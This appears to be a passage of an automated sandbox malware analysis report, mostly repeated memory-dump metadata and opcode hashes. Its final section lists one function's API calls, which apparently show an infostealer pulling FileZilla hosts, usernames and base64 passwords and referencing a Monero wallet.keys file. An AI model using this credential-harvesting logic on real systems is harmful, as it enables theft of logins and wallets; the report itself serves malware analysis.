                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: s>;$%rq]
                    • API String ID: 0-132130327
                    • Opcode ID: a4872c6f1c663052752f7e92335765bdef2c9431d8d822ffdcb9969853276278
                    • Instruction ID: 3843b012aa3a915ffcb3b465ac3ab913be439292b70affcbea532ea4b1515e53
                    • Opcode Fuzzy Hash: a4872c6f1c663052752f7e92335765bdef2c9431d8d822ffdcb9969853276278
                    • Instruction Fuzzy Hash: 1AB219F360C2049FE3046E2DEC8567ABBE5EF94720F1A893DEAC5C7744EA3558048697
                    Function 0077D019 Relevance: 4.1, Strings: 2, Instructions: 1590COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: [s/:$xbo\
                    • API String ID: 0-4192486534
                    • Opcode ID: c2d0907b89404df6652bfb09146aace9043281135151e0379f6182ef5773db77
                    • Instruction ID: a6ebeba2d79c89e4b1406194280f226d97160a5b8bddd1ec3e9b6aa6320e0518
                    • Opcode Fuzzy Hash: c2d0907b89404df6652bfb09146aace9043281135151e0379f6182ef5773db77
                    • Instruction Fuzzy Hash: 97B229F3A086149FD3046E2DEC8566AFBE9EF94720F1A493DEAC4C3744E63598018797
                    Function 006562B5 Relevance: 1.5, Strings: 1, Instructions: 209COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: Z^YU
                    • API String ID: 0-2477682694
                    • Opcode ID: 48e8af79c6c1a9eb3c261bad9460f8320de504887004cff30c82a1c0df67b34e
                    • Instruction ID: ceb586f730445b47b59a63bc8efede2860c91e085ffd75e1963e26a2d67695f5
                    • Opcode Fuzzy Hash: 48e8af79c6c1a9eb3c261bad9460f8320de504887004cff30c82a1c0df67b34e
                    • Instruction Fuzzy Hash: 9061E6F3E182109BE3086A28DC4937AB7D6EB94321F2B463DE6C9477C8D97918458686
                    Function 00710157 Relevance: .2, Instructions: 209COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 28fca9c690ebbe247bacb31369247475c86d569990eb75cab383fb895640a0fc
                    • Instruction ID: a3d1b7d01b2dc8307e66da55a4819c65a6dda7ddb415c7a0239be19d82675c80
                    • Opcode Fuzzy Hash: 28fca9c690ebbe247bacb31369247475c86d569990eb75cab383fb895640a0fc
                    • Instruction Fuzzy Hash: 0D6112B3E146204BE7586D79CC553AAB6D2ABC8320F2B463DDE89A77C4ED785C0583C1
                    Function 006EF09B Relevance: .2, Instructions: 198COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 376897ff4dcf1d68cfe2a250d4fb15551536a9b91ab19a9e1d404b4f2f51cf57
                    • Instruction ID: 0d62fd27195d491d02a29a5abd97dc1e0782bc835376fcb3be32fbb0932ae409
                    • Opcode Fuzzy Hash: 376897ff4dcf1d68cfe2a250d4fb15551536a9b91ab19a9e1d404b4f2f51cf57
                    • Instruction Fuzzy Hash: 0551D4F3A086009FE3086F29DC8577AB7E6EFC4310F1B853DDAC957784EA3918458686
                    Function 006C572E Relevance: .2, Instructions: 153COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0c827200fb012acd4cbf842cc8c3c498c02a77c0a65873f57ec715cae318bd5d
                    • Instruction ID: 0447c8d430e673d9856f6245979e706be386075829d47a190f5536eb56807068
                    • Opcode Fuzzy Hash: 0c827200fb012acd4cbf842cc8c3c498c02a77c0a65873f57ec715cae318bd5d
                    • Instruction Fuzzy Hash: C141F0B2A187085BE3547E2CECC537AF7D5EB18310F0A463DDA8993B44ED39690086DB
                    Function 0067972D Relevance: .1, Instructions: 130COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2862bef72abd1710ad72b85f6b9632ed0452c8ed203c25eb514692e82361c571
                    • Instruction ID: 68742e9f342e4ac7ef91112a29ec9a5109d834e7e214cd73473a7bdaf5ed1c5e
                    • Opcode Fuzzy Hash: 2862bef72abd1710ad72b85f6b9632ed0452c8ed203c25eb514692e82361c571
                    • Instruction Fuzzy Hash: 804163F3A186009FE304BF28D88577AF7E5EF94310F16493DD6D587384EA3984458B86
                    Function 007B249E Relevance: .1, Instructions: 87COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8162153ec68700a8c636d00ec66b3181f537b4fcc9c58b17cd25a0c824044518
                    • Instruction ID: 60a6d5d664cab1601a03c1734239390ccdd7db5fdaffbd429578aab1c1ae0c7e
                    • Opcode Fuzzy Hash: 8162153ec68700a8c636d00ec66b3181f537b4fcc9c58b17cd25a0c824044518
                    • Instruction Fuzzy Hash: 22216FB240C308AFE701BE28DC857BABBE4EB58754F06092DE6D583750E675A900C687
                    Function 007BCF13 Relevance: .1, Instructions: 83COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9f9372bb4ebdeec3cb805c4db74c6184483d5179f2f49f0a8c358e2a01ef32cf
                    • Instruction ID: c513344413bc6fc627ef9aa83ac7fda085c7b41e0a8ce44d1a41235a16d67e62
                    • Opcode Fuzzy Hash: 9f9372bb4ebdeec3cb805c4db74c6184483d5179f2f49f0a8c358e2a01ef32cf
                    • Instruction Fuzzy Hash: 9A2145B211C718AFE305BF68C88276AFBE4FF58310F06092DE7C582750E63594408B8B
                    Function 007E63EC Relevance: .1, Instructions: 75COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 763f3d589c6424f88acae65c6e890f4c57757f47bb9088cbc732cce41b089393
                    • Instruction ID: 41b271078335455e44db5323cb6b36865fde72da679ffe8efca1a05426c0a3c2
                    • Opcode Fuzzy Hash: 763f3d589c6424f88acae65c6e890f4c57757f47bb9088cbc732cce41b089393
                    • Instruction Fuzzy Hash: F2214CB251C7189FE745FE29DC856AAB7E5EF58310F058A2CE6D583744EB3164008A87
                    Function 003C9750 Relevance: .0, Instructions: 15COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                    Function 003C0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003C8E0B
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                      • Part of subcall function 003B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003B99EC
                      • Part of subcall function 003B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003B9A11
                      • Part of subcall function 003B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003B9A31
                      • Part of subcall function 003B99C0: ReadFile.KERNEL32(000000FF,?,00000000,003B148F,00000000), ref: 003B9A5A
                      • Part of subcall function 003B99C0: LocalFree.KERNEL32(003B148F), ref: 003B9A90
                      • Part of subcall function 003B99C0: CloseHandle.KERNEL32(000000FF), ref: 003B9A9A
                      • Part of subcall function 003C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003C8E52
                    • GetProcessHeap.KERNEL32(00000000,000F423F,003D0DBA,003D0DB7,003D0DB6,003D0DB3), ref: 003C0362
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003C0369
                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 003C0385
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C0393
                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 003C03CF
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C03DD
                    • StrStrA.SHLWAPI(00000000,<User>), ref: 003C0419
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C0427
                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 003C0463
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C0475
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C0502
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C051A
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C0532
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C054A
                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 003C0562
                    • lstrcat.KERNEL32(?,profile: null), ref: 003C0571
                    • lstrcat.KERNEL32(?,url: ), ref: 003C0580
                    • lstrcat.KERNEL32(?,00000000), ref: 003C0593
                    • lstrcat.KERNEL32(?,003D1678), ref: 003C05A2
                    • lstrcat.KERNEL32(?,00000000), ref: 003C05B5
                    • lstrcat.KERNEL32(?,003D167C), ref: 003C05C4
                    • lstrcat.KERNEL32(?,login: ), ref: 003C05D3
                    • lstrcat.KERNEL32(?,00000000), ref: 003C05E6
                    • lstrcat.KERNEL32(?,003D1688), ref: 003C05F5
                    • lstrcat.KERNEL32(?,password: ), ref: 003C0604
                    • lstrcat.KERNEL32(?,00000000), ref: 003C0617
                    • lstrcat.KERNEL32(?,003D1698), ref: 003C0626
                    • lstrcat.KERNEL32(?,003D169C), ref: 003C0635
                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C068E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
